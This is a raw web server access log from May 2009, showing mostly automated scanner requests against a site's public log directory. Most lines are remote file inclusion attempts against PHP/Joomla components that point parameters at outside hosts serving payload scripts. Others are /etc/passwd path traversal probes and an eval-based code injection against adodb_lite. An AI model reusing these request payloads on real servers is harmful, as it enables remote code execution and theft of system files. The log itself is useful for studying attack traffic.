69.172.92.14 - - [14/May/2009:19:01:06 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:19:01:06 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
121.165.73.157 - - [14/May/2009:19:03:29 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:19:03:29 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:19:03:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:19:03:33 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
201.27.5.41 - - [14/May/2009:19:04:26 -0500] "GET /logs/?custompluginfile[]=http://www.rennellcorp.com/logs/v4id.txt??? HTTP/1.1" 200 189444 "-""libwww-perl/5.805"
201.27.5.41 - - [14/May/2009:19:04:27 -0500] "GET /?custompluginfile[]=http://www.rennellcorp.com/logs/v4id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:19:07:34 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:19:07:35 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
190.144.44.36 - - [14/May/2009:19:12:54 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:19:12:54 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:19:12:54 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:19:13:03 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.142 - - [14/May/2009:19:13:29 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.107.180 - - [14/May/2009:19:14:00 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
221.139.104.104 - - [14/May/2009:19:14:24 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
221.139.104.104 - - [14/May/2009:19:14:24 -0500] "GET /logs/access_log.1240185600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
221.139.104.104 - - [14/May/2009:19:14:24 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
221.139.104.104 - - [14/May/2009:19:14:34 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.221.130.19 - - [14/May/2009:19:16:26 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:16:26 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:16:26 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:16:26 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
69.172.92.14 - - [14/May/2009:19:17:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:19:17:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
200.32.100.130 - - [14/May/2009:19:18:01 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:01 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:01 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:06 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:14 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:14 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:19:18:23 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.172.225.50 - - [14/May/2009:19:19:27 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 311 "-""core-project/1.0"
65.55.106.203 - - [14/May/2009:19:21:29 -0500] "GET /logs/access_log.1127520000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.182.137.218 - - [14/May/2009:19:26:36 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:26:37 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:26:37 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:26:43 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:26:43 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:26:44 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:27:17 -0500] "GET /logs/access_log.1232668800//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.182.137.218 - - [14/May/2009:19:27:29 -0500] "GET /logs/access_log.1232668800//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.19 - - [14/May/2009:19:28:05 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:28:05 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:28:05 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:28:05 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
64.118.90.253 - - [14/May/2009:19:32:01 -0500] "GET /logs//components/com_flyspray/startdown.php?file=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.118.90.253 - - [14/May/2009:19:32:01 -0500] "GET //components/com_flyspray/startdown.php?file=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.19 - - [14/May/2009:19:32:46 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 189449 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:32:46 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 189449 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:32:46 -0500] "GET //?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:32:47 -0500] "GET //?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
69.172.92.14 - - [14/May/2009:19:33:37 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 189449 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:19:33:37 -0500] "GET //?path%5Bdocroot%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
85.92.68.111 - - [14/May/2009:19:36:03 -0500] "GET /logs//components/com_flyspray/startdown.php?file=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.92.68.111 - - [14/May/2009:19:36:03 -0500] "GET //components/com_flyspray/startdown.php?file=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.172.92.14 - - [14/May/2009:19:36:18 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:19:36:19 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
65.55.106.234 - - [14/May/2009:19:38:31 -0500] "GET /logs/access_log.1185148800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.150.52.114 - - [14/May/2009:19:40:10 -0500] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:40:10 -0500] "GET /logs/access_log.1237248000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:40:10 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:15 -0500] "GET /logs/access_log.1231718400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:15 -0500] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:15 -0500] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:19 -0500] "GET /logs/access_log.1234224000/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:36 -0500] "GET /logs/access_log.1233964800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:36 -0500] "GET /logs/access_log.1239062400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:42 -0500] "GET /logs/access_log.1230940800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:42 -0500] "GET /logs/access_log.1236643200/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:42 -0500] "GET /logs/access_log.1237420800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:49 -0500] "GET /logs/access_log.1232064000/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:41:59 -0500] "GET /logs/access_log.1235260800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:00 -0500] "GET /logs/access_log.1231113600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:54 -0500] "GET /logs/access_log.1234051200/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:54 -0500] "GET /logs/access_log.1233446400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:59 -0500] "GET /logs/access_log.1230422400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:59 -0500] "GET /logs/access_log.1230336000/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:59 -0500] "GET /logs/access_log.1231977600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:42:59 -0500] "GET /logs/access_log.1238371200/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:43:02 -0500] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:43:02 -0500] "GET /logs/access_log.1237248000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:43:02 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:43:09 -0500] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:43:09 -0500] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:19:43:09 -0500] "GET /logs/access_log.1237248000///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:13 -0500] "GET /logs/access_log.1237334400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:17 -0500] "GET /logs/access_log.1237766400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:17 -0500] "GET /logs/access_log.1230854400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:17 -0500] "GET /logs/access_log.1232409600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:26 -0500] "GET /logs/access_log.1236297600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:26 -0500] "GET /logs/access_log.1236470400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:26 -0500] "GET /logs/access_log.1234137600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:26 -0500] "GET /logs/access_log.1238284800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:42 -0500] "GET /logs/access_log.1232150400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:42 -0500] "GET /logs/access_log.1235692800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:42 -0500] "GET /logs/access_log.1232236800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:50 -0500] "GET /logs/access_log.1234828800/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:50 -0500] "GET /logs/access_log.1237161600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:50 -0500] "GET /logs/access_log.1233878400/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:19:43:50 -0500] "GET /logs/access_log.1238889600/bbs//skin/zero_vote/ask_password.php?dir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:19:45:32 -0500] "GET /logs/access_log.1240617600//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:19:45:32 -0500] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:19:45:32 -0500] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.219.97.207 - - [14/May/2009:19:46:41 -0500] "GET /logs//components/com_flyspray/startdown.php?file=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.219.97.207 - - [14/May/2009:19:46:41 -0500] "GET //components/com_flyspray/startdown.php?file=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:19:49:56 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:19:49:56 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:19:49:56 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:19:50:06 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.221.130.19 - - [14/May/2009:19:51:17 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:51:18 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
65.55.106.155 - - [14/May/2009:19:55:04 -0500] "GET /logs/access_log.1168041600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.19 - - [14/May/2009:19:55:07 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:19:55:08 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
75.119.201.5 - - [14/May/2009:20:01:21 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:20:01:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:20:01:22 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
199.120.90.222 - - [14/May/2009:20:05:48 -0500] "GET /logs//?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:20:05:48 -0500] "GET //?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:05:54 -0500] "GET /logs//?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 189449 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
115.145.170.177 - - [14/May/2009:20:05:55 -0500] "GET //?sIncPath=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
